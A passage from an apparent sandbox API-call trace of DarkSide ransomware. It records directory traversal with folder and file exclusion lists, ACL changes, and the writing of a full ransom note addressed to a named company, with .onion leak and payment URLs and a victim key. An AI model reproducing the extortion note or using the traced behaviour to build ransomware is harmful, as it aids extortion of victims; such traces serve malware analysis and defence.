Buffer=0x2f30094, Length=0x80) returned 0xf47f614e [0156.174] RtlComputeCrc32 (PartialCrc=0x614e, Buffer=0x2f30094, Length=0x80) returned 0x9c167322 [0156.174] RtlComputeCrc32 (PartialCrc=0x7322, Buffer=0x2f30094, Length=0x80) returned 0xd8b126e8 [0156.174] RtlComputeCrc32 (PartialCrc=0x26e8, Buffer=0x2f30094, Length=0x80) returned 0x343856ca [0156.174] RtlComputeCrc32 (PartialCrc=0x56ca, Buffer=0x2f30094, Length=0x80) returned 0x5594ff91 [0156.174] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0156.174] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0156.174] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0156.174] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbad47e0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdbad47e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbad47e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.174] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.174] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.175] FindClose (in: hFindFile=0x2db8740 | out: hFindFile=0x2db8740) returned 1 [0156.175] _wcsicmp (_Str1="backup", _Str2="Searches") returned -17 [0156.175] wcslen (_String="backup") returned 0x6 [0156.175] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0156.176] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0156.176] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0156.176] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0156.176] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0156.176] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdffc9300, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdffc9300, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0156.176] _wcsicmp (_Str1="$recycle.bin", _Str2="Videos") returned -82 [0156.176] wcslen (_String="$recycle.bin") returned 0xc [0156.176] _wcsicmp (_Str1="config.msi", _Str2="Videos") returned -19 [0156.176] wcslen (_String="config.msi") returned 0xa [0156.176] _wcsicmp (_Str1="$windows.~bt", _Str2="Videos") returned -82 [0156.176] wcslen (_String="$windows.~bt") returned 0xc [0156.176] _wcsicmp (_Str1="$windows.~ws", _Str2="Videos") returned -82 [0156.176] wcslen (_String="$windows.~ws") returned 0xc [0156.176] _wcsicmp (_Str1="windows", _Str2="Videos") returned 1 [0156.176] wcslen (_String="windows") returned 0x7 [0156.176] _wcsicmp (_Str1="appdata", _Str2="Videos") returned -21 [0156.176] wcslen (_String="appdata") returned 0x7 [0156.177] _wcsicmp (_Str1="application data", _Str2="Videos") returned -21 [0156.177] wcslen (_String="application data") returned 0x10 [0156.177] _wcsicmp (_Str1="boot", _Str2="Videos") returned -20 [0156.177] wcslen (_String="boot") returned 0x4 [0156.177] _wcsicmp (_Str1="google", _Str2="Videos") returned -15 [0156.177] wcslen (_String="google") returned 0x6 [0156.177] _wcsicmp (_Str1="mozilla", _Str2="Videos") returned -9 [0156.177] wcslen (_String="mozilla") returned 0x7 [0156.177] _wcsicmp (_Str1="program files", _Str2="Videos") returned -6 [0156.177] wcslen (_String="program files") returned 0xd [0156.177] _wcsicmp (_Str1="program files (x86)", _Str2="Videos") returned -6 [0156.177] wcslen (_String="program files (x86)") returned 0x13 [0156.177] _wcsicmp (_Str1="programdata", _Str2="Videos") returned -6 [0156.177] wcslen (_String="programdata") returned 0xb [0156.177] _wcsicmp (_Str1="system volume information", _Str2="Videos") returned -3 [0156.177] wcslen (_String="system volume information") returned 0x19 [0156.177] _wcsicmp (_Str1="tor browser", _Str2="Videos") returned -2 [0156.177] wcslen (_String="tor browser") returned 0xb [0156.177] _wcsicmp (_Str1="windows.old", _Str2="Videos") returned 1 [0156.177] wcslen (_String="windows.old") returned 0xb [0156.177] _wcsicmp (_Str1="intel", _Str2="Videos") returned -13 [0156.177] wcslen (_String="intel") returned 0x5 [0156.177] _wcsicmp (_Str1="msocache", _Str2="Videos") returned -9 [0156.177] wcslen (_String="msocache") returned 0x8 [0156.177] _wcsicmp (_Str1="perflogs", _Str2="Videos") returned -6 [0156.177] wcslen (_String="perflogs") returned 0x8 [0156.177] _wcsicmp (_Str1="x64dbg", _Str2="Videos") returned 2 [0156.177] wcslen (_String="x64dbg") returned 0x6 [0156.177] _wcsicmp (_Str1="public", _Str2="Videos") returned -6 [0156.177] wcslen (_String="public") returned 0x6 [0156.177] _wcsicmp (_Str1="all users", _Str2="Videos") returned -21 [0156.177] wcslen (_String="all users") returned 0x9 [0156.177] _wcsicmp (_Str1="default", _Str2="Videos") returned -18 [0156.177] wcslen (_String="default") returned 0x7 [0156.177] wcscpy (in: _Dest=0x4480050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0156.177] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0156.177] wcscpy (in: _Dest=0x4480094, _Source="Videos" | out: _Dest="Videos") returned="Videos" [0156.177] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0156.178] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44b0068 [0156.178] wcscpy (in: _Dest=0x44a0060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0156.178] GetNamedSecurityInfoW () returned 0x0 [0156.179] SetEntriesInAclW () returned 0x0 [0156.179] SetNamedSecurityInfoW () returned 0x0 [0156.211] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d58698) returned 1 [0156.211] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3feabc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.211] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 1 [0156.211] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0156.211] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0156.211] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fea8c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fea8c*=0xa8f, lpOverlapped=0x0) returned 1 [0156.212] CloseHandle (hObject=0x678) returned 1 [0156.213] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0156.213] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 0x11 [0156.213] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="" [0156.213] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 0x29 [0156.213] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", fInfoLevelId=0x0, lpFindFileData=0x3fecec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fecec) returned 0x2db8740 [0156.213] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbb92ec0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbb92ec0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.214] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6421d680, ftCreationTime.dwHighDateTime=0x1d5e1bf, ftLastAccessTime.dwLowDateTime=0xf96e7510, ftLastAccessTime.dwHighDateTime=0x1d5ddc1, ftLastWriteTime.dwLowDateTime=0xf96e7510, ftLastWriteTime.dwHighDateTime=0x1d5ddc1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4710A08 09t9o0aXhpe", cAlternateFileName="4710A0~1")) returned 1 [0156.214] _wcsicmp (_Str1="$recycle.bin", _Str2="4710A08 09t9o0aXhpe") returned -16 [0156.214] wcslen (_String="$recycle.bin") returned 0xc [0156.214] _wcsicmp (_Str1="config.msi", _Str2="4710A08 09t9o0aXhpe") returned 47 [0156.214] wcslen (_String="config.msi") returned 0xa [0156.214] _wcsicmp (_Str1="$windows.~bt", _Str2="4710A08 09t9o0aXhpe") returned -16 [0156.214] wcslen (_String="$windows.~bt") returned 0xc [0156.214] _wcsicmp (_Str1="$windows.~ws", _Str2="4710A08 09t9o0aXhpe") returned -16 [0156.214] wcslen (_String="$windows.~ws") returned 0xc [0156.214] _wcsicmp (_Str1="windows", _Str2="4710A08 09t9o0aXhpe") returned 67 [0156.214] wcslen (_String="windows") returned 0x7 [0156.214] _wcsicmp (_Str1="appdata", _Str2="4710A08 09t9o0aXhpe") returned 45 [0156.214] wcslen (_String="appdata") returned 0x7 [0156.214] _wcsicmp (_Str1="application data", _Str2="4710A08 09t9o0aXhpe") returned 45 [0156.214] wcslen (_String="application data") returned 0x10 [0156.214] _wcsicmp (_Str1="boot", _Str2="4710A08 09t9o0aXhpe") returned 46 [0156.214] wcslen (_String="boot") returned 0x4 [0156.214] _wcsicmp (_Str1="google", _Str2="4710A08 09t9o0aXhpe") returned 51 [0156.214] wcslen (_String="google") returned 0x6 [0156.214] _wcsicmp (_Str1="mozilla", _Str2="4710A08 09t9o0aXhpe") returned 57 [0156.214] wcslen (_String="mozilla") returned 0x7 [0156.214] _wcsicmp (_Str1="program files", _Str2="4710A08 09t9o0aXhpe") returned 60 [0156.214] wcslen (_String="program files") returned 0xd [0156.214] _wcsicmp (_Str1="program files (x86)", _Str2="4710A08 09t9o0aXhpe") returned 60 [0156.214] wcslen (_String="program files (x86)") returned 0x13 [0156.214] _wcsicmp (_Str1="programdata", _Str2="4710A08 09t9o0aXhpe") returned 60 [0156.214] wcslen (_String="programdata") returned 0xb [0156.214] _wcsicmp (_Str1="system volume information", _Str2="4710A08 09t9o0aXhpe") returned 63 [0156.214] wcslen (_String="system volume information") returned 0x19 [0156.214] _wcsicmp (_Str1="tor browser", _Str2="4710A08 09t9o0aXhpe") returned 64 [0156.214] wcslen (_String="tor browser") returned 0xb [0156.214] _wcsicmp (_Str1="windows.old", _Str2="4710A08 09t9o0aXhpe") returned 67 [0156.214] wcslen (_String="windows.old") returned 0xb [0156.214] _wcsicmp (_Str1="intel", _Str2="4710A08 09t9o0aXhpe") returned 53 [0156.214] wcslen (_String="intel") returned 0x5 [0156.214] _wcsicmp (_Str1="msocache", _Str2="4710A08 09t9o0aXhpe") returned 57 [0156.214] wcslen (_String="msocache") returned 0x8 [0156.215] _wcsicmp (_Str1="perflogs", _Str2="4710A08 09t9o0aXhpe") returned 60 [0156.215] wcslen (_String="perflogs") returned 0x8 [0156.215] _wcsicmp (_Str1="x64dbg", _Str2="4710A08 09t9o0aXhpe") returned 68 [0156.215] wcslen (_String="x64dbg") returned 0x6 [0156.215] _wcsicmp (_Str1="public", _Str2="4710A08 09t9o0aXhpe") returned 60 [0156.215] wcslen (_String="public") returned 0x6 [0156.215] _wcsicmp (_Str1="all users", _Str2="4710A08 09t9o0aXhpe") returned 45 [0156.215] wcslen (_String="all users") returned 0x9 [0156.215] _wcsicmp (_Str1="default", _Str2="4710A08 09t9o0aXhpe") returned 48 [0156.215] wcslen (_String="default") returned 0x7 [0156.215] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*" [0156.215] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*") returned 0x2a [0156.215] wcscpy (in: _Dest=0x44b00ba, _Source="4710A08 09t9o0aXhpe" | out: _Dest="4710A08 09t9o0aXhpe") returned="4710A08 09t9o0aXhpe" [0156.215] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0156.215] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0156.216] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe" [0156.216] GetNamedSecurityInfoW () returned 0x0 [0156.216] SetEntriesInAclW () returned 0x0 [0156.216] SetNamedSecurityInfoW () returned 0x0 [0156.222] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d58738) returned 1 [0156.222] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe83c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.222] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe")) returned 1 [0156.222] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0156.222] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0156.224] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe80c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe80c*=0xa8f, lpOverlapped=0x0) returned 1 [0156.225] CloseHandle (hObject=0x678) returned 1 [0156.226] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0156.226] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe")) returned 0x10 [0156.226] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\") returned="" [0156.226] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\") returned 0x3d [0156.226] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\*", fInfoLevelId=0x0, lpFindFileData=0x3fea6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea6c) returned 0x2db8780 [0156.226] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6421d680, ftCreationTime.dwHighDateTime=0x1d5e1bf, ftLastAccessTime.dwLowDateTime=0xdbbb9020, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbbb9020, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.226] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6956c660, ftCreationTime.dwHighDateTime=0x1d5e19c, ftLastAccessTime.dwLowDateTime=0x1315cf30, ftLastAccessTime.dwHighDateTime=0x1d5e656, ftLastWriteTime.dwLowDateTime=0x1315cf30, ftLastWriteTime.dwHighDateTime=0x1d5e656, nFileSizeHigh=0x0, nFileSizeLow=0x162d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="78UJVg7V.mp4", cAlternateFileName="")) returned 1 [0156.226] _wcsicmp (_Str1="78UJVg7V.mp4", _Str2="README.c06622a1.TXT") returned -59 [0156.227] wcsstr (_Str="78UJVg7V.mp4", _SubStr="README") returned 0x0 [0156.227] _wcsicmp (_Str1="autorun.inf", _Str2="78UJVg7V.mp4") returned 42 [0156.227] wcslen (_String="autorun.inf") returned 0xb [0156.227] _wcsicmp (_Str1="boot.ini", _Str2="78UJVg7V.mp4") returned 43 [0156.227] wcslen (_String="boot.ini") returned 0x8 [0156.227] _wcsicmp (_Str1="bootfont.bin", _Str2="78UJVg7V.mp4") returned 43 [0156.227] wcslen (_String="bootfont.bin") returned 0xc [0156.227] _wcsicmp (_Str1="bootsect.bak", _Str2="78UJVg7V.mp4") returned 43 [0156.227] wcslen (_String="bootsect.bak") returned 0xc [0156.227] _wcsicmp (_Str1="desktop.ini", _Str2="78UJVg7V.mp4") returned 45 [0156.227] wcslen (_String="desktop.ini") returned 0xb [0156.227] _wcsicmp (_Str1="iconcache.db", _Str2="78UJVg7V.mp4") returned 50 [0156.227] wcslen (_String="iconcache.db") returned 0xc [0156.227] _wcsicmp (_Str1="ntldr", _Str2="78UJVg7V.mp4") returned 55 [0156.227] wcslen (_String="ntldr") returned 0x5 [0156.227] _wcsicmp (_Str1="ntuser.dat", _Str2="78UJVg7V.mp4") returned 55 [0156.227] wcslen (_String="ntuser.dat") returned 0xa [0156.227] _wcsicmp (_Str1="ntuser.dat.log", _Str2="78UJVg7V.mp4") returned 55 [0156.227] wcslen (_String="ntuser.dat.log") returned 0xe [0156.227] _wcsicmp (_Str1="ntuser.ini", _Str2="78UJVg7V.mp4") returned 55 [0156.227] wcslen (_String="ntuser.ini") returned 0xa [0156.227] _wcsicmp (_Str1="thumbs.db", _Str2="78UJVg7V.mp4") returned 61 [0156.227] wcslen (_String="thumbs.db") returned 0x9 [0156.227] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0156.227] wcslen (_String="386") returned 0x3 [0156.227] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0156.227] wcslen (_String="adv") returned 0x3 [0156.227] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0156.227] wcslen (_String="ani") returned 0x3 [0156.227] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0156.227] wcslen (_String="bat") returned 0x3 [0156.227] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0156.227] wcslen (_String="bin") returned 0x3 [0156.227] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0156.227] wcslen (_String="cab") returned 0x3 [0156.227] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 